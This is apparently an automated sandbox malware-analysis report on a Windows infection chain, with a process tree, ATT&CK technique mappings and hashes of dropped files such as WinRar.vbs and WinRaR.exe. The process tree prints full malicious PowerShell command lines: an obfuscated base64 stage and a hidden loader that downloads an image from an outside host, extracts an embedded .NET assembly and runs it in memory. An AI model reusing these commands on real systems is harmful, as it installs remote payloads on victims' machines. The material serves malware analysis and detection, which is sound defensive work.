৻Hg⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻r⦷ ⠊ ⟙ ᧳ ৻D0⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻HI⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻BG⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻YQBn⦷ ⠊ ⟙ ᧳ ৻C4⦷ ⠊ ⟙ ᧳ ৻T⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻ZwB0⦷ ⠊ ⟙ ᧳ ৻Gg⦷ ⠊ ⟙ ᧳ ৻Ow⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻GI⦷ ⠊ ⟙ ᧳ ৻YQBz⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻Ng⦷ ⠊ ⟙ ᧳ ৻0⦷ ⠊ ⟙ ᧳ ৻Ew⦷ ⠊ ⟙ ᧳ ৻ZQBu⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bo⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻PQ⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻ZQBu⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻SQBu⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻ZQB4⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻LQ⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻cwB0⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻cgB0⦷ ⠊ ⟙ ᧳ ৻Ek⦷ ⠊ ⟙ ᧳ ৻bgBk⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻e⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻7⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻YgBh⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻ZQ⦷ ⠊ ⟙ ᧳ ৻2⦷ ⠊ ⟙ ᧳ ৻DQ⦷ ⠊ ⟙ ᧳ ৻QwBv⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻bQBh⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻D0⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻Gk⦷ ⠊ ⟙ ᧳ ৻bQBh⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻ZQBU⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻e⦷ ⠊ ⟙ ᧳ ৻B0⦷ ⠊ ⟙ ᧳ ৻C4⦷ ⠊ ⟙ ᧳ ৻UwB1⦷ ⠊ ⟙ ᧳ ৻GI⦷ ⠊ ⟙ ᧳ ৻cwB0⦷ ⠊ ⟙ ᧳ ৻HI⦷ ⠊ ⟙ ᧳ ৻aQBu⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻K⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻HI⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻BJ⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻Hg⦷ ⠊ ⟙ ᧳ ৻L⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻YgBh⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻ZQ⦷ ⠊ ⟙ ᧳ ৻2⦷ ⠊ ⟙ ᧳ ৻DQ⦷ ⠊ ⟙ ᧳ ৻T⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻ZwB0⦷ ⠊ ⟙ ᧳ ৻Gg⦷ ⠊ ⟙ ᧳ ৻KQ⦷ ⠊ ⟙ ᧳ ৻7⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻YwBv⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻bQBh⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻BC⦷ ⠊ ⟙ ᧳ ৻Hk⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻9⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻WwBT⦷ ⠊ ⟙ ᧳ ৻Hk⦷ ⠊ ⟙ ᧳ ৻cwB0⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻bQ⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻EM⦷ ⠊ ⟙ ᧳ ৻bwBu⦷ ⠊ ⟙ ᧳ ৻HY⦷ ⠊ ⟙ ᧳ ৻ZQBy⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻XQ⦷ ⠊ ⟙ ᧳ ৻6⦷ ⠊ ⟙ ᧳ ৻Do⦷ ⠊ ⟙ ᧳ ৻RgBy⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻bQBC⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻cwBl⦷ ⠊ ⟙ ᧳ ৻DY⦷ ⠊ ⟙ ᧳ ৻N⦷ ⠊ ⟙ ᧳ ৻BT⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻cgBp⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Zw⦷ ⠊ ⟙ ᧳ ৻o⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻YgBh⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻ZQ⦷ ⠊ ⟙ ᧳ ৻2⦷ ⠊ ⟙ ᧳ ৻DQ⦷ ⠊ ⟙ ᧳ ৻QwBv⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻bQBh⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻p⦷ ⠊ ⟙ ᧳ ৻Ds⦷ ⠊ ⟙ ᧳ ৻J⦷ ⠊ ⟙ ᧳ ৻Bs⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻YQBk⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻BB⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻cwBl⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻YgBs⦷ ⠊ ⟙ ᧳ ৻Hk⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻9⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻WwBT⦷ ⠊ ⟙ ᧳ ৻Hk⦷ ⠊ ⟙ ᧳ ৻cwB0⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻bQ⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻FI⦷ ⠊ ⟙ ᧳ ৻ZQBm⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻ZQBj⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻aQBv⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻LgBB⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻cwBl⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻YgBs⦷ ⠊ ⟙ ᧳ ৻Hk⦷ ⠊ ⟙ ᧳ ৻XQ⦷ ⠊ ⟙ ᧳ ৻6⦷ ⠊ ⟙ ᧳ ৻Do⦷ ⠊ ⟙ ᧳ ৻T⦷ ⠊ ⟙ ᧳ ৻Bv⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻o⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻YwBv⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻bQBh⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻BC⦷ ⠊ ⟙ ᧳ ৻Hk⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻KQ⦷ ⠊ ⟙ ᧳ ৻7⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻B5⦷ ⠊ ⟙ ᧳ ৻H⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻ZQ⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻D0⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻bwBh⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻ZQBk⦷ ⠊ ⟙ ᧳ ৻EE⦷ ⠊ ⟙ ᧳ ৻cwBz⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻bQBi⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻eQ⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻Ec⦷ ⠊ ⟙ ᧳ ৻ZQB0⦷ ⠊ ⟙ ᧳ ৻FQ⦷ ⠊ ⟙ ᧳ ৻eQBw⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻K⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻n⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻bgBs⦷ ⠊ ⟙ ᧳ ৻Gk⦷ ⠊ ⟙ ᧳ ৻Yg⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻Ek⦷ ⠊ ⟙ ᧳ ৻Tw⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻Eg⦷ ⠊ ⟙ ᧳ ৻bwBt⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻Jw⦷ ⠊ ⟙ ᧳ ৻p⦷ ⠊ ⟙ ᧳ ৻Ds⦷ ⠊ ⟙ ᧳ ৻J⦷ ⠊ ⟙ ᧳ ৻Bt⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bo⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻D0⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻eQBw⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻LgBH⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻BN⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bo⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻o⦷ ⠊ ⟙ ᧳ ৻Cc⦷ ⠊ ⟙ ᧳ ৻VgBB⦷ ⠊ ⟙ ᧳ ৻Ek⦷ ⠊ ⟙ ᧳ ৻Jw⦷ ⠊ ⟙ ᧳ ৻p⦷ ⠊ ⟙ ᧳ ৻C4⦷ ⠊ ⟙ ᧳ ৻SQBu⦷ ⠊ ⟙ ᧳ ৻HY⦷ ⠊ ⟙ ᧳ ৻bwBr⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻K⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻dQBs⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻L⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻Fs⦷ ⠊ ⟙ ᧳ ৻bwBi⦷ ⠊ ⟙ ᧳ ৻Go⦷ ⠊ ⟙ ᧳ ৻ZQBj⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻WwBd⦷ ⠊ ⟙ ᧳ ৻F0⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻o⦷ ⠊ ⟙ ᧳ ৻Cc⦷ ⠊ ⟙ ᧳ ৻NwBh⦷ ⠊ ⟙ ᧳ ৻Dc⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻w⦷ ⠊ ⟙ ᧳ ৻Dk⦷ ⠊ ⟙ ᧳ ৻MwBl⦷ ⠊ ⟙ ᧳ ৻D⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻NQ⦷ ⠊ ⟙ ᧳ ৻0⦷ ⠊ ⟙ ᧳ ৻GM⦷ ⠊ ⟙ ᧳ ৻LQBh⦷ ⠊ ⟙ ᧳ ৻D⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻MwBh⦷ ⠊ ⟙ ᧳ ৻C0⦷ ⠊ ⟙ ᧳ ৻Mw⦷ ⠊ ⟙ ᧳ ৻1⦷ ⠊ ⟙ ᧳ ৻DQ⦷ ⠊ ⟙ ᧳ ৻N⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻t⦷ ⠊ ⟙ ᧳ ৻DI⦷ ⠊ ⟙ ᧳ ৻Yg⦷ ⠊ ⟙ ᧳ ৻4⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻LQBh⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻M⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻x⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻y⦷ ⠊ ⟙ ᧳ ৻D⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻PQBu⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻awBv⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻JgBh⦷ ⠊ ⟙ ᧳ ৻Gk⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻PQB0⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻YQ⦷ ⠊ ⟙ ᧳ ৻/⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻e⦷ ⠊ ⟙ ᧳ ৻B0⦷ ⠊ ⟙ ᧳ ৻C4⦷ ⠊ ⟙ ᧳ ৻MQ⦷ ⠊ ⟙ ᧳ ৻z⦷ ⠊ ⟙ ᧳ ৻Go⦷ ⠊ ⟙ ᧳ ৻bg⦷ ⠊ ⟙ ᧳ ৻v⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻LwBt⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻Yw⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻bwBw⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻c⦷ ⠊ ⟙ ᧳ ৻Bw⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻LgBm⦷ ⠊ ⟙ ᧳ ৻DY⦷ ⠊ ⟙ ᧳ ৻OQBm⦷ ⠊ ⟙ ᧳ ৻DQ⦷ ⠊ ⟙ ᧳ ৻LQBy⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻Yg⦷ ⠊ ⟙ ᧳ ৻v⦷ ⠊ ⟙ ᧳ ৻GI⦷ ⠊ ⟙ ᧳ ৻Lw⦷ ⠊ ⟙ ᧳ ৻w⦷ ⠊ ⟙ ᧳ ৻HY⦷ ⠊ ⟙ ᧳ ৻LwBt⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻Yw⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻aQBw⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻ZQBs⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻bwBv⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻LgBl⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻YQBy⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bz⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻cwBh⦷ ⠊ ⟙ ᧳ ৻GI⦷ ⠊ ⟙ ᧳ ৻ZQBy⦷ ⠊ ⟙ ᧳ ৻Gk⦷ ⠊ ⟙ ᧳ ৻Zg⦷ ⠊ ⟙ ᧳ ৻v⦷ ⠊ ⟙ ᧳ ৻C8⦷ ⠊ ⟙ ᧳ ৻OgBz⦷ ⠊ ⟙ ᧳ ৻H⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻B0⦷ ⠊ ⟙ ᧳ ৻Gg⦷ ⠊ ⟙ ᧳ ৻Jw⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻Cw⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻n⦷ ⠊ ⟙ ᧳ ৻DE⦷ ⠊ ⟙ ᧳ ৻Jw⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻Cw⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻n⦷ ⠊ ⟙ ᧳ ৻EM⦷ ⠊ ⟙ ᧳ ৻OgBc⦷ ⠊ ⟙ ᧳ ৻F⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻cgBv⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻cgBh⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻R⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻YQBc⦷ ⠊ ⟙ ᧳ ৻Cc⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻s⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻JwBl⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻b⦷ ⠊ ⟙ ᧳ ৻Bp⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻bgBh⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻bw⦷ ⠊ ⟙ ᧳ ৻n⦷ ⠊ ⟙ ᧳ ৻Cw⦷ ⠊ ⟙ ᧳ ৻JwBB⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻BJ⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻U⦷ ⠊ ⟙ ᧳ ৻By⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻YwBl⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻cw⦷ ⠊ ⟙ ᧳ ৻z⦷ ⠊ ⟙ ᧳ ৻DI⦷ ⠊ ⟙ ᧳ ৻Jw⦷ ⠊ ⟙ ᧳ ৻s⦷ ⠊ ⟙ ᧳ ৻Cc⦷ ⠊ ⟙ ᧳ ৻Jw⦷ ⠊ ⟙ ᧳ ৻p⦷ ⠊ ⟙ ᧳ ৻Ck⦷ ⠊ ⟙ ᧳ ৻';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⦷ ⠊ ⟙ ᧳ ৻','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:652
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('7a7d093e054c-a03a-3544-2b8a-aa01dd20=nekot&aidem=tla?txt.13jn/o/moc.topsppa.f69f4-redalb/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'estellionato','AddInProcess32',''))"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1996

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scripting

T1064

Persistence

Privilege Escalation

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\WinRar.vbs

Filesize
180KB

MD5
a11d30db36ba79960ed3e408979d851c

SHA1
9b5ccba948c577b35a4687edf378d6080be55a47

SHA256
336b3ee044a15bde31546384502eefbf230050a3c87cc5f392534d1d7378a5d2

SHA512
00049b7011249128e48d08a836e39eefeda83784ee56582ab4661070674ebeb7245a760da25b1ff3dd81a203abfff002b1bf3eadba88acbd1833d04156c9d5bb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
710f5d7c2dafd816efe6397fa2884471

SHA1
41ca0dbc678830721c98f88721259abad3ecd2d6

SHA256
1e9e84a46a3356d90e186de5cc21aed695881c7da7bfc8d213b2ac9eb998bd45

SHA512
ab3fdcfe2e5d541ea96777a624e50c523b685f166e2d8870250f98e7967662045e4bb75f21d3b290ca9528af03b10b4be1ea06cf56b00317405ac550c992bf65

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab9EF0.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarC237.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
0fb82470801aba9a2027ec5363687f99

SHA1
e3cbcf062c7b3c386ef4255b9370b52df076ddb2

SHA256
860db07f9cd1d2741ba4505d9c1f18a2e8d89f8e64690d980715b24141963455

SHA512
8550f9a21a6bf170691245c27e79971f7909c35a5fbeb1e8bf176c044754dc99b1d9d8e33df5cd801cb08bdbf1ba406b96e7fb339fd899e0650848c52e667e76

Download Submit
\ProgramData\WinRaR.exe

Filesize
457KB

MD5
c8dcff7ac01d7f5da2357ad2f560aa25

SHA1
66d9d560e6eba3ad8839793016b690c38e4d1a15

SHA256
